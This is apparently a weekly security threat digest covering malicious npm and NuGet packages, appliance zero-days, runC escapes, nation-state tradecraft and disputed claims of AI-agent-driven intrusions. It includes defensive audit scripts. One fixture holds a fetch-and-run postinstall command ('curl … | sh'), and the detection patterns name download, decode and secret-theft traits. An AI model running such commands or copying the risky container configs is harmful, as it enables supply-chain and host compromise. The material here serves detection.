Trust Is the New Attack Surface — Supply-Chain Sabotage, AI-Scaled Intrusions & Edge Zero-Days

SISA Weekly Threat Watch – our weekly feature brings you a quick snapshot of the major security vulnerabilities that posed a threat to organizations worldwide. These recurring, actionable threat advisories also provide information and recommendations to help security teams take appropriate action against the latest critical threats.

1. Supply Chain = Soft Underbelly

Attackers are blending tiny, surgical payloads into trusted developer ecosystems (NuGet, npm, IDE marketplaces) so compromise looks like normal dev activity. The result is intermittent failures, credential leakage, and CI/CD token theft—often without obvious alarms.

  • NuGet: covert sabotage with probabilistic kill-switches — Nine .NET packages hide ~20-line hooks that, once hard-coded 2027–2028 trigger dates are reached, terminate the host process with roughly 20% probability and can corrupt Siemens S7 PLC writes after a 30–90 minute delay, a design meant to frustrate diagnosis.

  • VS Code + npm cluster → Vidar 2.0 — A rogue VS Code extension exfiltrates and encrypts local files while polling a private GitHub repo for C2; 17 npm packages use postinstall to drop Vidar 2.0 and resolve C2 via Telegram/Steam.

  • @acitons/artifact typosquat (later confirmed as a red-team exercise) — A near-name npm package harvested GitHub Actions secrets during postinstall and staged encrypted exfiltration to an app.github.dev subdomain; the tactic is realistic even though this run turned out to be controlled.

  • Global supply-chain pressure — Beyond single packages, 2025 saw SSO/provider breaches, dormant Magento backdoors re-awakened, npm maintainer token theft, and ransomware disruptions across manufacturing and logistics.
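
A manifest-level check that turns the three package incidents above into something a build pipeline can run before any hook executes: it lists the lifecycle hooks npm would run on its own, flags hook commands that download, decode or read secrets, and catches near-name packages such as a scope that is one transposition away from @actions. This is an added example for this digest, not code from SISA or from any package named above; the manifests are constructed, and the heuristics and trusted-name list are assumptions to tune per organisation.

```python
"""Pre-install audit of npm manifests: which lifecycle hooks npm would run on its
own, what those hook commands do, and whether the package name is a near-miss of
a name we actually depend on. Added example, not SISA's or npm's code; the
manifests are constructed, the heuristics and trusted names are assumptions."""
import json
import re
from difflib import SequenceMatcher

# Hooks npm runs automatically when a package is installed as a dependency
# (all of them are skipped when `npm ci --ignore-scripts` is used).
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Traits of a hook command that warrant a human look: (regex, reason). Assumed heuristics.
SUSPICIOUS = (
    (r"\b(curl|wget)\b", "downloads content at install time"),
    (r"\bnode\s+-e\b", "runs inline JavaScript"),
    (r"base64|atob\(", "decodes base64 at install time"),
    (r"https?://(?!registry\.npmjs\.org/)", "contacts a non-registry URL"),
    (r"process\.env|GITHUB_TOKEN|ACTIONS_RUNTIME_TOKEN", "touches environment/CI secrets"),
)

# Packages this organisation really uses; anything close-but-not-equal is suspect (assumption).
TRUSTED_NAMES = ("@actions/artifact", "@actions/core", "@actions/github", "lodash", "express")


def near_name_findings(name, trusted=TRUSTED_NAMES, threshold=0.85):
    """Flag a name within `threshold` similarity of a trusted name without being it."""
    if name in trusted:
        return []
    findings = []
    for t in trusted:
        score = SequenceMatcher(None, name, t).ratio()
        if score >= threshold:
            findings.append(
                f"name {name!r} is a near-name of trusted {t!r} "
                f"(similarity {score:.2f}): possible typosquat"
            )
    return findings


def audit_manifest(manifest):
    """Return findings for one parsed package.json (an empty list means nothing to review)."""
    findings = near_name_findings(manifest.get("name", ""))
    scripts = manifest.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        findings.append(f"{hook} hook would run: {cmd!r}")
        for pattern, reason in SUSPICIOUS:
            if re.search(pattern, cmd):
                findings.append(f"{hook} {reason}")
    return findings


def audit_file(path):
    """Audit a package.json on disk, e.g. each node_modules/*/package.json after `npm ci --ignore-scripts`."""
    with open(path, encoding="utf-8") as fh:
        return audit_manifest(json.load(fh))


# Constructed manifests: a near-name package with an install hook, a package
# that fetches a script at install time, and a clean one.
SAMPLE_MANIFESTS = {
    "near-name": {"name": "@acitons/artifact", "version": "4.0.1",
                  "scripts": {"postinstall": "node -e \"require('./setup.js')\""}},
    "downloader": {"name": "left-pad-utils", "version": "1.0.3",
                   "scripts": {"postinstall": "curl -fsSL https://example.invalid/s.sh | sh"}},
    "clean": {"name": "@actions/artifact", "version": "2.1.0",
              "scripts": {"build": "tsc", "test": "jest"}},
}

if __name__ == "__main__":
    for label, manifest in SAMPLE_MANIFESTS.items():
        print(label, audit_manifest(manifest) or ["no findings"])
```

Run it over node_modules after `npm ci --ignore-scripts` (or with `ignore-scripts=true` in .npmrc) and re-enable hooks only for packages whose findings have been reviewed; pinning exact versions and integrity hashes in the lockfile is what keeps a reviewed package from changing underneath the audit.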

2. AI in the Kill Chain

AI now amplifies both persuasion and operations. Deepfakes speed up social engineering against real-time payment rails, while claims of agentic intrusions, disputed or not, signal where attacker tradecraft is heading.

  • Payments: AI-driven fraud at speed — Voice clones, dual-call scams, and QR-code payload tricks target UPI/RTP flows; the RatOn Android malware and abused RMM tools provide covert access and rapid cash-out to crypto.

  • Agentic espionage (claims under scrutiny) — A report alleges 80–90% autonomous intrusion activity driven by an AI coding agent across ~30 organizations; researchers dispute the claim because the report lacks IOCs, but the automation pattern is instructive.

3. Edge & Appliance Zero-Days

Internet-facing appliances remain low-friction entry points. Fresh pre-auth flaws translate into instant admin and turnkey footholds for lateral movement.

  • FortiWeb: header-forged admin via fwbcgi — Path traversal plus a crafted CGIINFO header lets attackers impersonate admin and add persistent local admins; active exploitation preceded patches.

  • QNAP NAS: seven zero-days patched — CGI overflows, command injection, and path traversal enable unauth RCE against QTS/QuTS hero and backup apps; rapid patching is critical for ransomware prevention.

  • ASUS DSL routers: auth bypass (CVE-2025-59367) — Remote, unauthenticated admin access on DSL-AC51/N16/AC750 is fixed in firmware 1.1.2.3_1010; WAN-exposed units are prime botnet targets.

4. Runtime & Enterprise Escalation

Small runtime misconfigurations can chain into container escapes and domain dominance—often by abusing legitimate features and “expected” admin tooling.

  • runC: unsafe bind-mount/symlink handling — Three flaws allow arbitrary host writes and potential container escape where custom mounts/privileged configs are allowed; fixed in 1.2.8/1.3.3/1.4.0-rc.3.

  • UNC6485 on Triofox (CVE-2025-12480) — Auth bypass re-runs the setup flow to add a “Cluster Admin” account; abuse of the configurable antivirus-scanner path runs attacker code as SYSTEM, drops Zoho Assist/AnyDesk, and tunnels RDP over SSH to climb to Domain Admin.
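
The runC item above only matters where the container's own configuration gives a mount bug something to reach: host bind mounts, root without a user namespace, CAP_SYS_ADMIN, or /proc entries left unmasked. The audit below checks an OCI runtime config.json (the spec runc actually executes) for exactly those settings. It is an added example for this digest, not runc's or any vendor's tooling; the two specs are constructed, and the sensitive-path, capability and masked-path lists are assumptions to adjust per environment.

```python
"""Audit an OCI runtime config.json for settings that let a runtime mount bug
become a host compromise: no user namespace, bind mounts of sensitive host paths
(or any writable host bind), dangerous capabilities, and unmasked /proc entries.
Added example, not runc's own tooling; specs are constructed, lists are assumptions."""
import json

SENSITIVE_HOST_PATHS = ("/etc", "/root", "/home", "/run", "/var/run", "/proc", "/sys", "/dev", "/boot")
DANGEROUS_CAPS = ("CAP_SYS_ADMIN", "CAP_SYS_MODULE", "CAP_SYS_PTRACE", "CAP_DAC_READ_SEARCH")
EXPECT_MASKED = ("/proc/kcore", "/proc/keys", "/proc/timer_list", "/sys/firmware")
EXPECT_READONLY = ("/proc/sys", "/proc/sysrq-trigger")


def is_host_bind(mount):
    """True for a bind/rbind of a host path ('bind' in Docker-generated specs, 'none' in runc examples)."""
    opts = mount.get("options") or []
    return mount.get("type") in ("bind", "none") and ("bind" in opts or "rbind" in opts)


def is_sensitive(src):
    """The host root, or anything under a path an attacker could write to for persistence/escape."""
    return src == "/" or any(src == p or src.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)


def audit_oci_spec(spec):
    findings = []
    linux = spec.get("linux") or {}
    process = spec.get("process") or {}
    ns_types = {n.get("type") for n in linux.get("namespaces") or []}
    uid = (process.get("user") or {}).get("uid", 0)
    if "user" not in ns_types:
        findings.append(f"no user namespace: uid {uid} in the container is uid {uid} on the host")
    if "mount" not in ns_types:
        findings.append("no mount namespace: container shares the host mount table")
    bounding = (process.get("capabilities") or {}).get("bounding") or []
    for cap in DANGEROUS_CAPS:
        if cap in bounding:
            findings.append(f"{cap} in the bounding set")
    for m in spec.get("mounts") or []:
        if not is_host_bind(m):
            continue
        src, dst, opts = m.get("source", ""), m.get("destination", ""), m.get("options") or []
        if is_sensitive(src):
            findings.append(f"bind mount exposes sensitive host path {src} at {dst}")
        if "ro" not in opts:
            findings.append(f"writable host bind {src} -> {dst}")
    masked = set(linux.get("maskedPaths") or [])
    findings += [f"{p} not in maskedPaths" for p in EXPECT_MASKED if p not in masked]
    readonly = set(linux.get("readonlyPaths") or [])
    findings += [f"{p} not in readonlyPaths" for p in EXPECT_READONLY if p not in readonly]
    return findings


def audit_file(path):
    with open(path, encoding="utf-8") as fh:
        return audit_oci_spec(json.load(fh))


# Constructed specs: one with the guardrails from this digest, one "privileged-style" build.
_COMMON_NS = [{"type": "pid"}, {"type": "network"}, {"type": "ipc"}, {"type": "uts"}, {"type": "mount"}]
_PROC = {"destination": "/proc", "type": "proc", "source": "proc"}
SAMPLE_SPECS = {
    "hardened": {
        "ociVersion": "1.1.0",
        "process": {"user": {"uid": 1000, "gid": 1000},
                    "capabilities": {"bounding": ["CAP_CHOWN", "CAP_NET_BIND_SERVICE"]}},
        "root": {"path": "rootfs", "readonly": True},
        "mounts": [_PROC, {"destination": "/app", "type": "bind", "source": "/srv/app",
                           "options": ["rbind", "ro"]}],
        "linux": {"namespaces": _COMMON_NS + [{"type": "user"}],
                  "uidMappings": [{"containerID": 0, "hostID": 100000, "size": 65536}],
                  "maskedPaths": list(EXPECT_MASKED), "readonlyPaths": list(EXPECT_READONLY)},
    },
    "risky": {
        "ociVersion": "1.1.0",
        "process": {"user": {"uid": 0, "gid": 0},
                    "capabilities": {"bounding": ["CAP_CHOWN", "CAP_SYS_ADMIN"]}},
        "root": {"path": "rootfs"},
        "mounts": [_PROC,
                   {"destination": "/host", "type": "bind", "source": "/", "options": ["rbind", "rw"]},
                   {"destination": "/var/run/docker.sock", "type": "bind",
                    "source": "/var/run/docker.sock", "options": ["rbind", "rw"]}],
        "linux": {"namespaces": _COMMON_NS},
    },
}

if __name__ == "__main__":
    for label, spec in SAMPLE_SPECS.items():
        print(label, audit_oci_spec(spec) or ["no findings"])
```

Upgrading runC closes the specific bugs; a config that passes this audit is what keeps the next mount-handling flaw from reaching the host.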

5. Nation-State Tradecraft: Quiet Persistence & Device Wipes

State-aligned actors emphasize long-dwell stealth—scheduled tasks, LOLBins, DLL side-loading—and even weaponize legitimate cloud device-management to erase traces on mobile endpoints.

  • PRC-aligned cluster activity — Steady use of SYSTEM scheduled tasks, msbuild.exe/csc.exe egress, AV-path DLL side-loading, and misconfigured IIS for durable domain-wide reach.

  • Konni/Kimsuky: Android wipes via Find Hub — Stolen Google/Naver creds enable remote Android resets; Windows persistence via AutoIt + scheduled tasks with multi-RAT tooling (EndRAT, Remcos, Quasar).

6. Ransomware & TTP Shifts

“Leak-first” extortion keeps outpacing encryption. New families iterate quickly while loaders target browser sessions and MFA cookies to streamline exfil and pressure.

  • Weekly landscape snapshot — New and rebranded families (Kyber, ShadowLock, VoidCrypt, Yurei) appear; tradecraft such as fast-flux DNS, TOR2DNS relays, and disposable C2 expands; telecom, government, manufacturing, and cloud/CI/CD remain in the blast zone.

Proactive Steps for the Week

  • Lock down the dev supply chain: Enforce signed/verified publishers, pin exact versions + hashes, block lifecycle scripts by default in CI (--ignore-scripts), and allow-list IDE extensions. Hunt for date-based logic, Process.Kill(), and tiny extension methods hooking DB/PLC calls.

  • Harden secrets in CI/CD: Scope GitHub/PAT tokens minimally, rotate anything touched by unvetted builds, segregate “install” jobs from secrets, and monitor runner egress to GitHub-like domains.

  • Patch the edge fast: Prioritize FortiWeb, QNAP, and ASUS firmware; remove public management access, enforce 2FA, and restrict admin interfaces behind VPN/ACLs.

  • Container runtime guardrails: Upgrade runC; avoid privileged/custom-mount containers; adopt rootless mode and user namespaces; alert on suspicious symlink/bind-mount behavior.

  • Identity & egress controls: Add adaptive MFA/lockouts, tighten DC replication rights, and monitor compiler/AV processes making outbound connections.

  • Payment-fraud defenses: Add voice-biometric or in-app confirmations for high-value transfers; sandbox QR-code payloads that rely on redirects or encodings; rate-limit new payees and watch UPI-to-crypto flows.

  • Mobile & dev endpoint hygiene: Enforce MDM on developer laptops; review Google/Naver account access, revoke sessions, and audit for Find-Hub actions.

  • AI abuse readiness: Log prompts targeting guardrail bypass, require human approval for sensitive AI-assisted operations, and build detections for unusually fast, multi-threaded recon/exploitation sequences.
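
Two of the monitoring steps above (runner egress to GitHub-like domains, and compiler/AV processes making outbound connections) reduce to the same triage over connection logs, so one worked check covers both. It is an added example for this digest, not SISA's tooling or any product's rule set; the log format, the per-build host allowlist and the watched-process list are assumptions, and the log lines are constructed.

```python
"""Egress triage for CI runners and domain hosts: flag compiler/AV processes that
reach out, and any connection to a GitHub-branded or look-alike host the build
does not need. Added example, not SISA's tooling; log format, allowlist and
watched processes are assumptions, and the sample log is constructed."""
import re
from difflib import SequenceMatcher

# Exact hosts a build on this runner is expected to reach (assumption; tune per pipeline).
ALLOWED_HOSTS = {
    "github.com", "api.github.com", "codeload.github.com",
    "objects.githubusercontent.com", "registry.npmjs.org", "api.nuget.org",
}
# Processes that compile, scan or build and have no business talking to the internet (assumption).
WATCHED_PROCS = {"msbuild.exe", "csc.exe", "vbc.exe", "msmpeng.exe"}
GENUINE_GITHUB_SUFFIXES = (".github.com", ".githubusercontent.com")

# Assumed EDR/proxy export: timestamp host= proc= pid= dst=ip:port sni=fqdn
LINE_RE = re.compile(
    r"(?P<ts>\S+)\s+host=(?P<host>\S+)\s+proc=(?P<proc>\S+)\s+pid=(?P<pid>\d+)\s+"
    r"dst=(?P<ip>[\d.]+):(?P<port>\d+)\s+sni=(?P<sni>\S+)"
)


def github_lookalike(fqdn):
    """GitHub-branded hosts the build does not use, plus registrable domains one edit away from github.com."""
    h = fqdn.lower()
    if h == "github.com" or h.endswith(GENUINE_GITHUB_SUFFIXES):
        return False
    if "github" in h:  # e.g. *.app.github.dev from a runner, or github.com.evil.net
        return True
    base = ".".join(h.split(".")[-2:])  # crude registrable domain: g1thub.com
    return SequenceMatcher(None, base, "github.com").ratio() >= 0.85


def triage(line):
    """Return (severity, reason) alerts for one log line; [] means expected egress."""
    m = LINE_RE.match(line)
    if not m:
        return [("parse-error", line)]
    proc, sni = m["proc"].lower(), m["sni"].lower()
    if sni in ALLOWED_HOSTS:
        return []
    alerts = []
    if proc in WATCHED_PROCS:
        alerts.append(("high", f"{m['proc']} on {m['host']} made an outbound connection to {sni}"))
    if github_lookalike(sni):
        alerts.append(("high", f"{m['proc']} on {m['host']} reached GitHub-branded/look-alike host {sni} "
                               f"that is not on the build allowlist"))
    if not alerts:
        alerts.append(("low", f"{m['proc']} on {m['host']} reached unlisted host {sni}"))
    return alerts


def triage_all(lines):
    return [alert for line in lines for alert in triage(line)]


# Constructed sample: a compiler calling out, a runner staging data to a github.dev
# subdomain, a desktop hitting a look-alike, and two lines of normal build traffic.
SAMPLE_LOG = """\
2025-11-18T10:02:11Z host=build-runner-07 proc=csc.exe pid=4412 dst=203.0.113.7:443 sni=updates.example.net
2025-11-18T10:02:13Z host=build-runner-07 proc=node.exe pid=4420 dst=192.0.2.10:443 sni=registry.npmjs.org
2025-11-18T10:02:19Z host=build-runner-07 proc=node.exe pid=4420 dst=198.51.100.5:443 sni=abc-3000.app.github.dev
2025-11-18T10:03:02Z host=ws-dev-14 proc=git.exe pid=911 dst=192.0.2.20:443 sni=api.github.com
2025-11-18T10:03:40Z host=ws-dev-14 proc=chrome.exe pid=950 dst=203.0.113.9:443 sni=g1thub.com
"""

if __name__ == "__main__":
    for severity, reason in triage_all(SAMPLE_LOG.splitlines()):
        print(severity, reason)
```

The allowlist is deliberately exact hosts rather than suffixes: a runner that legitimately needs api.github.com has no reason to reach an app.github.dev subdomain, and that distinction is what separates the @acitons/artifact-style exfil from normal Actions traffic.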

To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.

For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.
